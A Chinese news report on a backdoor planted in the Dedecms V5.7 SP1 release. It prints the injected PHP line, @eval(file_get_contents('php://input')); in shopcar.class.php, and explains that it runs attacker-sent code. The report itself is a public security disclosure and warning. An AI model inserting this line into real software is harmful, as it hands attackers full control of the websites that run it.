昨日，烏云漏洞平臺發布最新報告稱，著名開源建站軟件Dedecms V5.7 SP1正式版被植入后門，通過該后門可成功入侵并控制使用dedecms的網站。

Dedecms被曝植入后門

據烏云報告，被植入的后門是在/include/shopcar.class.php文件中，被植入的代碼為@eval(file_get_contents(‘php://input’));，烏云介紹稱，通過該后門可成功入侵dedecms網站。有網友對植入的該后門予以證實，稱其在2012-3-18 19:08下載的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代碼。

據了解，@eval(file_get_contents(‘php://input’));是將請求的數據流作為腳本語言執行，通過該后門，可以上傳PHP后門來控制整個網站。使用Dedecms V5.7 SP1正式版建站的站長，需立即對后門代碼進行刪除，以保護網站安全。

Dedecms是一款開源建站軟件，其最早是由IT柏拉圖個人開發，并在2007年進行了公司化運作。目前，國內有不少網站都使用了Dedecms系統，不過在Dedecms創始人IT柏拉圖的離開后，Dedecms屢次被曝出安全漏洞問題。截至發稿，Dedecms官方尚未對該漏洞進行任何回應。